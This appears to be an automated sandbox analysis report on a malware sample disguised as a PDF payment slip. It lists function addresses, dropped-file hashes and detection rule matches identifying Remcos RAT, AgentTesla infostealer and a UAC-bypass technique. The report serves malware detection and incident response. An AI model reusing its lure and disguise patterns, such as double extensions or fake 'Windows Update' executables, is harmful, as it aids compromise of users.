Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00404B74	14_2_00404B74
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00404B03	14_2_00404B03
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044BBD8	14_2_0044BBD8
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00404BE5	14_2_00404BE5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00404C76	14_2_00404C76
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00415CFE	14_2_00415CFE
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00416D72	14_2_00416D72
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00446D30	14_2_00446D30
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00446D8B	14_2_00446D8B
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00406E8F	14_2_00406E8F
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_0040D044	15_2_0040D044
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00405038	15_2_00405038
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_004050A9	15_2_004050A9
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_0040511A	15_2_0040511A
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_004051AB	15_2_004051AB
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_004382F3	15_2_004382F3
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00430575	15_2_00430575
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_0043B671	15_2_0043B671
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_0041F6CD	15_2_0041F6CD
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_004119CF	15_2_004119CF
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00439B11	15_2_00439B11
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00438E54	15_2_00438E54
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00412F67	15_2_00412F67
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_0043CF18	15_2_0043CF18
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_004050C2	16_2_004050C2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_004014AB	16_2_004014AB
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00405133	16_2_00405133
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_004051A4	16_2_004051A4
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00401246	16_2_00401246
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_0040CA46	16_2_0040CA46
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00405235	16_2_00405235
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_004032C8	16_2_004032C8
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00401689	16_2_00401689
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00402F60	16_2_00402F60
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00425152	17_2_00425152
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00435286	17_2_00435286
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004513D4	17_2_004513D4
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0045050B	17_2_0045050B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00436510	17_2_00436510
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004316FB	17_2_004316FB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0043569E	17_2_0043569E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00443700	17_2_00443700
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004257FB	17_2_004257FB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004128E3	17_2_004128E3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00425964	17_2_00425964
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0041B917	17_2_0041B917
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0043D9CC	17_2_0043D9CC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00435AD3	17_2_00435AD3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00424BC3	17_2_00424BC3
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0043DBFB	17_2_0043DBFB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0044ABA9	17_2_0044ABA9
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00433C0B	17_2_00433C0B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00434D8A	17_2_00434D8A
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0043DE2A	17_2_0043DE2A
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0041CEAF	17_2_0041CEAF
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00435F08	17_2_00435F08
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_0307A1A0	24_2_0307A1A0
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_03076BA3	24_2_03076BA3
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_03079588	24_2_03079588
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_030798D0	24_2_030798D0
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06812B30	24_2_06812B30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06813148	24_2_06813148
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06810B70	24_2_06810B70
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_0685EF70	24_2_0685EF70
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06850548	24_2_06850548
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06856280	24_2_06856280
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_0685C250	24_2_0685C250
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_068574E7	24_2_068574E7
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_068574E8	24_2_068574E8
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_0685C24F	24_2_0685C24F
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AA3608	24_2_06AA3608
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AA7088	24_2_06AA7088
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AAAFDC	24_2_06AAAFDC
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AA39D8	24_2_06AA39D8
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AAC328	24_2_06AAC328
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AAC322	24_2_06AAC322
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AAD01F	24_2_06AAD01F
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AA2FE8	24_2_06AA2FE8
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_06AA0B30	24_2_06AA0B30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Code function: 24_2_072C2668	24_2_072C2668

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\conserver.exe 41EB6FF6BA3D97A93130C3F670A1453B4FFA5F6CC8F7E8960A42648CFFEB2BD5
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\host.exe E6720928EA03235A4A2AE2183D8E82483EAB11C5D77EC554CA3D85CC69D244B2

Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: String function: 00432525 appears 42 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: String function: 00412968 appears 78 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: String function: 00421A32 appears 43 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: String function: 00416760 appears 69 times
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: String function: 0044407A appears 37 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: String function: 00432525 appears 41 times

Source: Payment_Slip.pdf.exe, 00000000.00000002.1190274225.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000025A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000023A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1186212278.00000000024BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000000.1136659538.0000000000110000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3616615800.0000000004A34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3616254884.00000000049BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamef61e4e21-df97-4d15-8719-53241de53aab.exe4 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamef61e4e21-df97-e vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe	Binary or memory string: OriginalFileName vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.000000000041B000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Slip.pdf.exe
Source: Payment_Slip.pdf.exe	Binary or memory string: OriginalFilenameImLd.exe4 vs Payment_Slip.pdf.exe

Source: Payment_Slip.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
